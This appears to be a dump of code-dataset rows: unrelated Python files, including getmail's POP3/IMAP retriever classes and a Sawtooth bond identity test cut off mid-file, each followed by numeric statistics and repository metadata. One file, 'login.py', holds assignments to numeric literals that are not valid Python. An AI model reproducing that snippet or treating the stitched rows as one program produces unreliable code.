_pyangbind_elements = {'policy_cspf_interface_constraint': policy_cspf_interface_constraint, 'policy_cspf_group_computation_mode': policy_cspf_group_computation_mode, 'policy_use_bypass_metric': policy_use_bypass_metric, 'policy_use_bypass_liberal': policy_use_bypass_liberal, 'policy_implicite_commit': policy_implicite_commit, 'policy_label_propagate_ttl': policy_label_propagate_ttl, 'policy_vrf_propagate_ttl': policy_vrf_propagate_ttl, 'policy_propagate_ttl': policy_propagate_ttl, 'policy_rtm_route_filter_enabled': policy_rtm_route_filter_enabled, 'policy_rtm_route_filter_all_ibgp_enabled': policy_rtm_route_filter_all_ibgp_enabled, 'policy_load_interval': policy_load_interval, 'policy_ingress_tnnl_accounting': policy_ingress_tnnl_accounting, 'policy_te_policy_ospf': policy_te_policy_ospf, 'policy_te_policy_isis': policy_te_policy_isis, 'policy_ospf_area_defined': policy_ospf_area_defined, 'policy_ospf_area': policy_ospf_area, 'policy_handle_ospf_nbr_dn': policy_handle_ospf_nbr_dn, 'policy_handle_isis_nbr_dn': policy_handle_isis_nbr_dn, 'policy_lsp_fast_retry_on': policy_lsp_fast_retry_on, 'policy_max_lsp_retries': policy_max_lsp_retries, 'policy_lsp_retry_interval': policy_lsp_retry_interval, 'policy_frr_bkup_retry_interval': policy_frr_bkup_retry_interval, 'policy_auto_bw_enabled': policy_auto_bw_enabled, 'policy_auto_bw_sample_interval': policy_auto_bw_sample_interval, 'policy_soft_preempt_cleanup_timer': policy_soft_preempt_cleanup_timer, 'policy_rsvp_periodic_flooding_timer': policy_rsvp_periodic_flooding_timer, }
| 80.562613 | 1,546 | 0.77032 | 12,509 | 88,780 | 5.118075 | 0.019586 | 0.045188 | 0.046359 | 0.050358 | 0.967667 | 0.932867 | 0.897457 | 0.885024 | 0.861126 | 0.846397 | 0 | 0.012565 | 0.108955 | 88,780 | 1,101 | 1,547 | 80.635786 | 0.796744 | 0.204337 | 0 | 0.520408 | 0 | 0.044218 | 0.354798 | 0.239272 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137755 | false | 0.040816 | 0.013605 | 0 | 0.258503 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9ea8b1df44f1c664d3e3d186ed01ebcfca75382c | 99 | py | Python | Codewars/8kyu/super-duper-easy/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | 7 | 2017-09-20T16:40:39.000Z | 2021-08-31T18:15:08.000Z | Codewars/8kyu/super-duper-easy/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | Codewars/8kyu/super-duper-easy/Python/test.py | RevansChen/online-judge | ad1b07fee7bd3c49418becccda904e17505f3018 | [
"MIT"
] | null | null | null | # Python - 3.4.3
Test.assert_equals(problem('hello'), 'Error')
Test.assert_equals(problem(1), 56)
| 19.8 | 45 | 0.707071 | 16 | 99 | 4.25 | 0.6875 | 0.294118 | 0.470588 | 0.676471 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 0.090909 | 99 | 4 | 46 | 24.75 | 0.688889 | 0.141414 | 0 | 0 | 0 | 0 | 0.120482 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9eb60ffaa3542ec69903e59e708c33edf3737647 | 135 | py | Python | polyaxon/polyaxon/config_settings/hpsearch/__init__.py | wbuchwalter/polyaxon | a01396ea86a74082c457bfbc2c91d283b6ff6fba | [
"MIT"
] | null | null | null | polyaxon/polyaxon/config_settings/hpsearch/__init__.py | wbuchwalter/polyaxon | a01396ea86a74082c457bfbc2c91d283b6ff6fba | [
"MIT"
] | null | null | null | polyaxon/polyaxon/config_settings/hpsearch/__init__.py | wbuchwalter/polyaxon | a01396ea86a74082c457bfbc2c91d283b6ff6fba | [
"MIT"
] | null | null | null | from polyaxon.config_settings.persistence_data import *
from polyaxon.config_settings.persistence_outputs import *
from .apps import *
| 33.75 | 58 | 0.851852 | 17 | 135 | 6.529412 | 0.529412 | 0.216216 | 0.324324 | 0.468468 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.088889 | 135 | 3 | 59 | 45 | 0.902439 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
7b52235de3c10a61d84736b225baca2622245e0d | 23,086 | py | Python | roles/3_setup-topology/files/getmail-5.16/getmailcore/retrievers.py | Dennisvw99/NeDaGen | 9bd8871b80073031e3d5b898f76e2b57a8d10ccc | [
"MIT"
] | null | null | null | roles/3_setup-topology/files/getmail-5.16/getmailcore/retrievers.py | Dennisvw99/NeDaGen | 9bd8871b80073031e3d5b898f76e2b57a8d10ccc | [
"MIT"
] | null | null | null | roles/3_setup-topology/files/getmail-5.16/getmailcore/retrievers.py | Dennisvw99/NeDaGen | 9bd8871b80073031e3d5b898f76e2b57a8d10ccc | [
"MIT"
] | null | null | null | #!/usr/bin/env python2
'''Classes implementing retrievers (message sources getmail can retrieve mail
from).
Currently implemented:
SimplePOP3Retriever
SimplePOP3SSLRetriever
BrokenUIDLPOP3Retriever
BrokenUIDLPOP3SSLRetriever
MultidropPOP3Retriever
MultidropPOP3SSLRetriever
MultidropSDPSRetriever
SimpleIMAPRetriever -- IMAP, as a protocol, is a FPOS, and it shows.
The Python standard library module imaplib leaves much up to
the user because of this.
SimpleIMAPSSLRetriever - the above, for IMAP-over-SSL.
MultidropIMAPRetriever
MultidropIMAPSSLRetriever
'''
__all__ = [
'SimplePOP3Retriever',
'SimplePOP3SSLRetriever',
'BrokenUIDLPOP3Retriever',
'BrokenUIDLPOP3SSLRetriever',
'MultidropPOP3Retriever',
'MultidropPOP3SSLRetriever',
'MultidropSDPSRetriever',
'SimpleIMAPRetriever',
'SimpleIMAPSSLRetriever',
'MultidropIMAPRetriever',
'MultidropIMAPSSLRetriever',
]
import os
import poplib
import imaplib
import types
from getmailcore.exceptions import *
from getmailcore.constants import *
from getmailcore.utilities import *
from getmailcore.baseclasses import *
from getmailcore._retrieverbases import *
#
# Functional classes
#
#######################################
class SimplePOP3Retriever(POP3RetrieverBase, POP3initMixIn):
'''Retriever class for single-user POP3 mailboxes.
'''
_confitems = (
ConfInstance(name='configparser', required=False),
ConfDirectory(name='getmaildir', required=False, default='~/.getmail/'),
ConfInt(name='timeout', required=False, default=180),
ConfString(name='server'),
ConfInt(name='port', required=False, default=110),
ConfString(name='username'),
ConfPassword(name='password', required=False, default=None),
ConfTupleOfStrings(name='password_command', required=False, default=()),
ConfBool(name='use_apop', required=False, default=False),
ConfBool(name='delete_dup_msgids', required=False, default=False),
)
received_from = None
received_with = 'POP3'
received_by = localhostname()
def __str__(self):
self.log.trace()
return 'SimplePOP3Retriever:%s@%s:%s' % (
self.conf.get('username', 'username'),
self.conf.get('server', 'server'),
self.conf.get('port', 'port')
)
def showconf(self):
self.log.trace()
self.log.info('SimplePOP3Retriever(%s)' % self._confstring()
+ os.linesep)
#######################################
class SimplePOP3SSLRetriever(POP3RetrieverBase, POP3SSLinitMixIn):
'''Retriever class for single-user POP3-over-SSL mailboxes.
'''
_confitems = (
ConfInstance(name='configparser', required=False),
ConfDirectory(name='getmaildir', required=False, default='~/.getmail/'),
ConfInt(name='timeout', required=False, default=180),
ConfString(name='server'),
ConfInt(name='port', required=False, default=POP3_ssl_port),
ConfString(name='username'),
ConfPassword(name='password', required=False, default=None),
ConfTupleOfStrings(name='password_command', required=False, default=()),
ConfBool(name='use_apop', required=False, default=False),
ConfBool(name='delete_dup_msgids', required=False, default=False),
ConfFile(name='keyfile', required=False, default=None),
ConfFile(name='certfile', required=False, default=None),
ConfFile(name='ca_certs', required=False, default=None),
ConfTupleOfStrings(name='ssl_fingerprints', required=False, default=()),
ConfString(name='ssl_version', required=False, default=None),
ConfString(name='ssl_ciphers', required=False, default=None),
ConfString(name='ssl_cert_hostname', required=False, default=None),
)
received_from = None
received_with = 'POP3-SSL'
received_by = localhostname()
def __str__(self):
self.log.trace()
return 'SimplePOP3SSLRetriever:%s@%s:%s' % (
self.conf.get('username', 'username'),
self.conf.get('server', 'server'),
self.conf.get('port', 'port')
)
def showconf(self):
self.log.trace()
self.log.info('SimplePOP3SSLRetriever(%s)' % self._confstring()
+ os.linesep)
#######################################
class BrokenUIDLPOP3RetrieverBase(POP3RetrieverBase):
'''Retriever base class for single-user POP3 mailboxes on servers that do
not properly assign unique IDs to messages. Since with these broken servers
we cannot rely on UIDL, we have to use message numbers, which are unique
within a POP3 session, but which change across sessions. This class
therefore can not be used to leave old mail on the server and download only
new mail.
'''
received_from = None
received_by = localhostname()
def _read_oldmailfile(self):
'''Force list of old messages to be empty by making this a no-op, so
duplicated IDs are always treated as new messages.'''
self.log.trace()
def write_oldmailfile(self, unused, **kwargs):
'''Short-circuit writing the oldmail file.'''
self.log.trace()
def _getmsglist(self):
'''Don't rely on UIDL; instead, use just the message number.'''
self.log.trace()
try:
(response, msglist, octets) = self.conn.list()
for line in msglist:
msgnum = int(line.split()[0])
msgsize = int(line.split()[1])
self.msgnum_by_msgid[msgnum] = msgnum
self.msgid_by_msgnum[msgnum] = msgnum
self.msgsizes[msgnum] = msgsize
self.sorted_msgnum_msgid = sorted(self.msgid_by_msgnum.items())
except poplib.error_proto, o:
raise getmailOperationError('POP error (%s)' % o)
self.gotmsglist = True
#######################################
class BrokenUIDLPOP3Retriever(BrokenUIDLPOP3RetrieverBase, POP3initMixIn):
'''For broken POP3 servers without SSL.
'''
_confitems = (
ConfInstance(name='configparser', required=False),
ConfDirectory(name='getmaildir', required=False, default='~/.getmail/'),
ConfInt(name='timeout', required=False, default=180),
ConfString(name='server'),
ConfInt(name='port', required=False, default=110),
ConfString(name='username'),
ConfPassword(name='password', required=False, default=None),
ConfTupleOfStrings(name='password_command', required=False, default=()),
ConfBool(name='use_apop', required=False, default=False),
)
received_with = 'POP3'
def __str__(self):
self.log.trace()
return 'BrokenUIDLPOP3Retriever:%s@%s:%s' % (
self.conf.get('username', 'username'),
self.conf.get('server', 'server'),
self.conf.get('port', 'port')
)
def showconf(self):
self.log.trace()
self.log.info('BrokenUIDLPOP3Retriever(%s)' % self._confstring()
+ os.linesep)
#######################################
class BrokenUIDLPOP3SSLRetriever(BrokenUIDLPOP3RetrieverBase, POP3SSLinitMixIn):
'''For broken POP3 servers with SSL.
'''
_confitems = (
ConfInstance(name='configparser', required=False),
ConfDirectory(name='getmaildir', required=False, default='~/.getmail/'),
ConfInt(name='timeout', required=False, default=180),
ConfString(name='server'),
ConfInt(name='port', required=False, default=POP3_ssl_port),
ConfString(name='username'),
ConfPassword(name='password', required=False, default=None),
ConfTupleOfStrings(name='password_command', required=False, default=()),
ConfBool(name='use_apop', required=False, default=False),
ConfFile(name='keyfile', required=False, default=None),
ConfFile(name='certfile', required=False, default=None),
ConfFile(name='ca_certs', required=False, default=None),
ConfTupleOfStrings(name='ssl_fingerprints', required=False, default=()),
ConfString(name='ssl_version', required=False, default=None),
ConfString(name='ssl_ciphers', required=False, default=None),
ConfString(name='ssl_cert_hostname', required=False, default=None),
)
received_with = 'POP3-SSL'
def __str__(self):
self.log.trace()
return 'BrokenUIDLPOP3SSLRetriever:%s@%s:%s' % (
self.conf.get('username', 'username'),
self.conf.get('server', 'server'),
self.conf.get('port', 'port')
)
def showconf(self):
self.log.trace()
self.log.info('BrokenUIDLPOP3SSLRetriever(%s)' % self._confstring()
+ os.linesep)
#######################################
class MultidropPOP3Retriever(MultidropPOP3RetrieverBase, POP3initMixIn):
'''Retriever class for multi-drop POP3 mailboxes.
'''
_confitems = (
ConfInstance(name='configparser', required=False),
ConfDirectory(name='getmaildir', required=False, default='~/.getmail/'),
ConfInt(name='timeout', required=False, default=180),
ConfString(name='server'),
ConfInt(name='port', required=False, default=110),
ConfString(name='username'),
ConfPassword(name='password', required=False, default=None),
ConfTupleOfStrings(name='password_command', required=False, default=()),
ConfBool(name='use_apop', required=False, default=False),
ConfString(name='envelope_recipient'),
)
received_from = None
received_with = 'POP3'
received_by = localhostname()
def __str__(self):
self.log.trace()
return 'MultidropPOP3Retriever:%s@%s:%s' % (
self.conf.get('username', 'username'),
self.conf.get('server', 'server'),
self.conf.get('port', 'port')
)
def showconf(self):
self.log.trace()
self.log.info('MultidropPOP3Retriever(%s)' % self._confstring()
+ os.linesep)
#######################################
class MultidropPOP3SSLRetriever(MultidropPOP3RetrieverBase, POP3SSLinitMixIn):
'''Retriever class for multi-drop POP3-over-SSL mailboxes.
'''
_confitems = (
ConfInstance(name='configparser', required=False),
ConfDirectory(name='getmaildir', required=False, default='~/.getmail/'),
ConfInt(name='timeout', required=False, default=180),
ConfString(name='server'),
ConfInt(name='port', required=False, default=POP3_ssl_port),
ConfString(name='username'),
ConfPassword(name='password', required=False, default=None),
ConfTupleOfStrings(name='password_command', required=False, default=()),
ConfBool(name='use_apop', required=False, default=False),
ConfString(name='envelope_recipient'),
ConfFile(name='keyfile', required=False, default=None),
ConfFile(name='certfile', required=False, default=None),
ConfFile(name='ca_certs', required=False, default=None),
ConfTupleOfStrings(name='ssl_fingerprints', required=False, default=()),
ConfString(name='ssl_version', required=False, default=None),
ConfString(name='ssl_ciphers', required=False, default=None),
ConfString(name='ssl_cert_hostname', required=False, default=None),
)
received_from = None
received_with = 'POP3-SSL'
received_by = localhostname()
def __str__(self):
self.log.trace()
return 'MultidropPOP3SSLRetriever:%s@%s:%s' % (
self.conf.get('username', 'username'),
self.conf.get('server', 'server'),
self.conf.get('port', 'port')
)
def showconf(self):
self.log.trace()
self.log.info('MultidropPOP3SSLRetriever(%s)' % self._confstring()
+ os.linesep)
#######################################
class MultidropSDPSRetriever(SimplePOP3Retriever, POP3initMixIn):
'''Retriever class for multi-drop SDPS (demon.co.uk) mailboxes.
Extend POP3 class to include support for Demon's protocol extensions, known
as SDPS. A non-standard command (*ENV) is used to retrieve the message
envelope. See http://www.demon.net/helpdesk/products/mail/sdps-tech.shtml
for details.
Support originally requested by Paul Clifford for getmail v.2/3.
'''
_confitems = (
ConfInstance(name='configparser', required=False),
ConfDirectory(name='getmaildir', required=False, default='~/.getmail/'),
ConfInt(name='timeout', required=False, default=180),
ConfString(name='server'),
ConfInt(name='port', required=False, default=110),
ConfString(name='username'),
ConfPassword(name='password', required=False, default=None),
ConfTupleOfStrings(name='password_command', required=False, default=()),
# Demon apparently doesn't support APOP
ConfBool(name='use_apop', required=False, default=False),
)
received_from = None
received_with = 'SDPS'
received_by = localhostname()
def __str__(self):
self.log.trace()
return 'MultidropSDPSRetriever:%s@%s:%s' % (
self.conf.get('username', 'username'),
self.conf.get('server', 'server'),
self.conf.get('port', 'port')
)
def showconf(self):
self.log.trace()
self.log.info('MultidropSDPSRetriever(%s)' % self._confstring()
+ os.linesep)
def _getmsgbyid(self, msgid):
self.log.trace()
msg = SimplePOP3Retriever._getmsgbyid(self, msgid)
# The magic of SDPS is the "*ENV" command. Implement it:
try:
msgnum = self._getmsgnumbyid(msgid)
resp, lines, octets = self.conn._longcmd('*ENV %i' % msgnum)
except poplib.error_proto, o:
raise getmailConfigurationError(
'server does not support *ENV (%s)' % o
)
if len(lines) < 4:
raise getmailOperationError('short *ENV response (%s)' % lines)
msg.sender = lines[2]
msg.recipient = lines[3]
return msg
#######################################
class SimpleIMAPRetriever(IMAPRetrieverBase, IMAPinitMixIn):
'''Retriever class for single-user IMAPv4 mailboxes.
'''
_confitems = (
ConfInstance(name='configparser', required=False),
ConfDirectory(name='getmaildir', required=False, default='~/.getmail/'),
ConfInt(name='timeout', required=False, default=180),
ConfString(name='server'),
ConfInt(name='port', required=False, default=imaplib.IMAP4_PORT),
ConfString(name='username'),
ConfPassword(name='password', required=False, default=None),
ConfTupleOfStrings(name='password_command', required=False, default=()),
ConfTupleOfUnicode(name='mailboxes', required=False,
default="('INBOX', )", allow_specials=('ALL',)),
ConfBool(name='use_peek', required=False, default=True),
ConfString(name='move_on_delete', required=False, default=None),
ConfBool(name='record_mailbox', required=False, default=True),
# imaplib.IMAP4.login_cram_md5() requires the (unimplemented)
# .authenticate(), so we can't do this yet (?).
ConfBool(name='use_cram_md5', required=False, default=False),
ConfBool(name='use_kerberos', required=False, default=False),
ConfBool(name='use_xoauth2', required=False, default=False),
)
received_from = None
received_with = 'IMAP4'
received_by = localhostname()
def __str__(self):
self.log.trace()
return 'SimpleIMAPRetriever:%s@%s:%s' % (
self.conf.get('username', 'username'),
self.conf.get('server', 'server'),
self.conf.get('port', 'port')
)
def showconf(self):
self.log.trace()
self.log.info('SimpleIMAPRetriever(%s)' % self._confstring()
+ os.linesep)
#######################################
class SimpleIMAPSSLRetriever(IMAPRetrieverBase, IMAPSSLinitMixIn):
'''Retriever class for single-user IMAPv4-over-SSL mailboxes.
'''
_confitems = (
ConfInstance(name='configparser', required=False),
ConfDirectory(name='getmaildir', required=False, default='~/.getmail/'),
# socket.ssl() and socket timeouts were incompatible in Python 2.3;
# if you have problems, comment this line out
ConfInt(name='timeout', required=False, default=180),
ConfString(name='server'),
ConfInt(name='port', required=False, default=imaplib.IMAP4_SSL_PORT),
ConfString(name='username'),
ConfPassword(name='password', required=False, default=None),
ConfTupleOfStrings(name='password_command', required=False, default=()),
ConfTupleOfUnicode(name='mailboxes', required=False,
default="('INBOX', )", allow_specials=('ALL',)),
ConfBool(name='use_peek', required=False, default=True),
ConfString(name='move_on_delete', required=False, default=None),
ConfBool(name='record_mailbox', required=False, default=True),
ConfFile(name='keyfile', required=False, default=None),
ConfFile(name='certfile', required=False, default=None),
ConfFile(name='ca_certs', required=False, default=None),
ConfTupleOfStrings(name='ssl_fingerprints', required=False, default=()),
ConfString(name='ssl_version', required=False, default=None),
ConfString(name='ssl_ciphers', required=False, default=None),
# imaplib.IMAP4.login_cram_md5() requires the (unimplemented)
# .authenticate(), so we can't do this yet (?).
ConfBool(name='use_cram_md5', required=False, default=False),
ConfBool(name='use_kerberos', required=False, default=False),
ConfBool(name='use_xoauth2', required=False, default=False),
ConfString(name='ssl_cert_hostname', required=False, default=None),
)
received_from = None
received_with = 'IMAP4-SSL'
received_by = localhostname()
def __str__(self):
self.log.trace()
return 'SimpleIMAPSSLRetriever:%s@%s:%s' % (
self.conf.get('username', 'username'),
self.conf.get('server', 'server'),
self.conf.get('port', 'port')
)
def showconf(self):
self.log.trace()
self.log.info('SimpleIMAPSSLRetriever(%s)' % self._confstring()
+ os.linesep)
#######################################
class MultidropIMAPRetriever(MultidropIMAPRetrieverBase, IMAPinitMixIn):
'''Retriever class for multi-drop IMAPv4 mailboxes.
'''
_confitems = (
ConfInstance(name='configparser', required=False),
ConfDirectory(name='getmaildir', required=False, default='~/.getmail/'),
ConfInt(name='timeout', required=False, default=180),
ConfString(name='server'),
ConfInt(name='port', required=False, default=imaplib.IMAP4_PORT),
ConfString(name='username'),
ConfPassword(name='password', required=False, default=None),
ConfTupleOfStrings(name='password_command', required=False, default=()),
ConfTupleOfUnicode(name='mailboxes', required=False,
default="('INBOX', )", allow_specials=('ALL',)),
ConfBool(name='use_peek', required=False, default=True),
ConfString(name='move_on_delete', required=False, default=None),
ConfBool(name='record_mailbox', required=False, default=True),
# imaplib.IMAP4.login_cram_md5() requires the (unimplemented)
# .authenticate(), so we can't do this yet (?).
ConfBool(name='use_cram_md5', required=False, default=False),
ConfBool(name='use_kerberos', required=False, default=False),
ConfBool(name='use_xoauth2', required=False, default=False),
ConfString(name='envelope_recipient'),
)
received_from = None
received_with = 'IMAP4'
received_by = localhostname()
def __str__(self):
self.log.trace()
return 'MultidropIMAPRetriever:%s@%s:%s' % (
self.conf.get('username', 'username'),
self.conf.get('server', 'server'),
self.conf.get('port', 'port')
)
def showconf(self):
self.log.trace()
self.log.info('MultidropIMAPRetriever(%s)' % self._confstring()
+ os.linesep)
#######################################
class MultidropIMAPSSLRetriever(MultidropIMAPRetrieverBase, IMAPSSLinitMixIn):
'''Retriever class for multi-drop IMAPv4-over-SSL mailboxes.
'''
_confitems = (
ConfInstance(name='configparser', required=False),
ConfDirectory(name='getmaildir', required=False, default='~/.getmail/'),
# socket.ssl() and socket timeouts were incompatible in Python 2.3;
# if you have problems, comment this line out
ConfInt(name='timeout', required=False, default=180),
ConfString(name='server'),
ConfInt(name='port', required=False, default=imaplib.IMAP4_SSL_PORT),
ConfString(name='username'),
ConfPassword(name='password', required=False, default=None),
ConfTupleOfStrings(name='password_command', required=False, default=()),
ConfTupleOfUnicode(name='mailboxes', required=False,
default="('INBOX', )", allow_specials=('ALL',)),
ConfBool(name='use_peek', required=False, default=True),
ConfString(name='move_on_delete', required=False, default=None),
ConfBool(name='record_mailbox', required=False, default=True),
ConfFile(name='keyfile', required=False, default=None),
ConfFile(name='certfile', required=False, default=None),
ConfFile(name='ca_certs', required=False, default=None),
ConfTupleOfStrings(name='ssl_fingerprints', required=False, default=()),
ConfString(name='ssl_version', required=False, default=None),
ConfString(name='ssl_ciphers', required=False, default=None),
# imaplib.IMAP4.login_cram_md5() requires the (unimplemented)
# .authenticate(), so we can't do this yet (?).
ConfBool(name='use_cram_md5', required=False, default=False),
ConfBool(name='use_kerberos', required=False, default=False),
ConfBool(name='use_xoauth2', required=False, default=False),
ConfString(name='envelope_recipient'),
ConfString(name='ssl_cert_hostname', required=False, default=None),
)
received_from = None
received_with = 'IMAP4-SSL'
received_by = localhostname()
def __str__(self):
self.log.trace()
return 'MultidropIMAPSSLRetriever:%s@%s:%s' % (
self.conf.get('username', 'username'),
self.conf.get('server', 'server'),
self.conf.get('port', 'port')
)
def showconf(self):
self.log.trace()
self.log.info('MultidropIMAPSSLRetriever(%s)' % self._confstring()
+ os.linesep)
| 41.521583 | 80 | 0.632461 | 2,333 | 23,086 | 6.159023 | 0.127304 | 0.124852 | 0.176769 | 0.075162 | 0.768877 | 0.764771 | 0.72218 | 0.718282 | 0.693507 | 0.687939 | 0 | 0.008271 | 0.214459 | 23,086 | 555 | 81 | 41.596396 | 0.784064 | 0.0337 | 0 | 0.745721 | 0 | 0 | 0.165962 | 0.043121 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.05379 | 0.022005 | null | null | 0.012225 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
7bb6a2d7058bf98036ac3356a46321f8b2abb51c | 210 | py | Python | modm/exceptions.py | ikheu/modm | 8798be52ff9ddc283a74a74ab965e7fe8e80bc13 | [
"MIT"
] | 1 | 2020-09-09T14:53:21.000Z | 2020-09-09T14:53:21.000Z | modm/exceptions.py | ikheu/modm | 8798be52ff9ddc283a74a74ab965e7fe8e80bc13 | [
"MIT"
] | null | null | null | modm/exceptions.py | ikheu/modm | 8798be52ff9ddc283a74a74ab965e7fe8e80bc13 | [
"MIT"
] | null | null | null | class ModmException(Exception):
""" base exception of modm """
class FieldInvalid(ModmException):
""" when filed is invalid """
class FieldLacked(ModmException):
""" when filed is not enough """
| 21 | 36 | 0.680952 | 22 | 210 | 6.5 | 0.636364 | 0.237762 | 0.307692 | 0.335664 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.190476 | 210 | 9 | 37 | 23.333333 | 0.841176 | 0.338095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 7 |
c89630b1977ea0f9481785cb9bf047ff7f73b8e7 | 22 | py | Python | login.py | liangyue0/test2 | d0042affa53133365e33b583e5ad7dd9e9c6c9ae | [
"MIT"
] | null | null | null | login.py | liangyue0/test2 | d0042affa53133365e33b583e5ad7dd9e9c6c9ae | [
"MIT"
] | null | null | null | login.py | liangyue0/test2 | d0042affa53133365e33b583e5ad7dd9e9c6c9ae | [
"MIT"
] | null | null | null | 0=1
10=2
num=1
num1=2
| 4.4 | 6 | 0.636364 | 8 | 22 | 1.75 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.444444 | 0.181818 | 22 | 4 | 7 | 5.5 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a81c79727a45de03a9720a64601ff1a4cd078030 | 63,945 | py | Python | extensions/bond/tests/test_identity_txn_families.py | gabykyei/GC_BlockChain_T_Rec | b72cb483064852d0a60286943ff55233462fea08 | [
"Apache-2.0"
] | 1 | 2019-03-18T13:31:11.000Z | 2019-03-18T13:31:11.000Z | extensions/bond/tests/test_identity_txn_families.py | gabykyei/GC_BlockChain_T_Rec | b72cb483064852d0a60286943ff55233462fea08 | [
"Apache-2.0"
] | null | null | null | extensions/bond/tests/test_identity_txn_families.py | gabykyei/GC_BlockChain_T_Rec | b72cb483064852d0a60286943ff55233462fea08 | [
"Apache-2.0"
] | null | null | null | # Copyright 2016 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
import unittest
import time
from gossip import signed_object
from journal.object_store import ObjectStore
from sawtooth_bond.txn_family import BondTransaction
from sawtooth_bond.updates.bond import CreateBondUpdate
from sawtooth_bond.updates.identity import CreateOrganizationUpdate
from sawtooth_bond.updates.identity import CreateParticipantUpdate
from sawtooth_bond.updates.trading import CreateOrderUpdate
from sawtooth_bond.updates.trading import CreateQuoteUpdate
from sawtooth.exceptions import InvalidTransactionError
class TestCreateOrganizationUpate(unittest.TestCase):
def setUp(self):
self.key = signed_object.generate_signing_key()
participant = CreateParticipantUpdate("CreateParticipant", "testuser")
object_id = participant._object_id
transaction = BondTransaction({})
transaction._updates = [participant]
self.store = ObjectStore()
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
def test_organization_is_valid_valid(self):
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
'Updates': [{"UpdateType": "CreateOrganization",
"name": "Test Bank",
"ticker": "T",
"pricing_source": "ABCD",
"authorization": []
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
transaction.apply(self.store)
except InvalidTransactionError:
self.fail("This should be valid")
def test_organization_is_valid_object_id(self):
k = self.store.keys()[0]
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
'Updates': [{"UpdateType": "CreateOrganization",
"name": "Test Bank",
"ticker": "T",
"pricing_source": "ABCD",
"authorization": [],
"object_id": k
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
self.fail("Object_id already exists")
except InvalidTransactionError:
pass
def test_organization_is_valid_name(self):
# create organization
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
'Updates': [{"UpdateType": "CreateOrganization",
"name": "Test Bank",
"ticker": "T",
"pricing_source": "ABCD",
"authorization": []
}]
})
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
# add organization with the same name
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
'Updates': [{"UpdateType": "CreateOrganization",
"name": "Test Bank",
"ticker": "F",
"pricing_source": "ABCf",
"authorization": []
}]
})
transaction.sign_object(self.key)
try:
transaction.check_valid(self.store)
self.fail("Name already exists")
except InvalidTransactionError:
pass
def test_organization_is_valid_ticker(self):
# create organization
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
'Updates': [{"UpdateType": "CreateOrganization",
"name": "Test Bank1",
"ticker": "T",
"pricing_source": "ABCD",
"authorization": []
}]
})
transaction.sign_object(self.key)
transaction.check_valid(self.store)
transaction.apply(self.store)
# add organization with the same name
transaction = BondTransaction({
"UpdateType": "CreateOrganization",
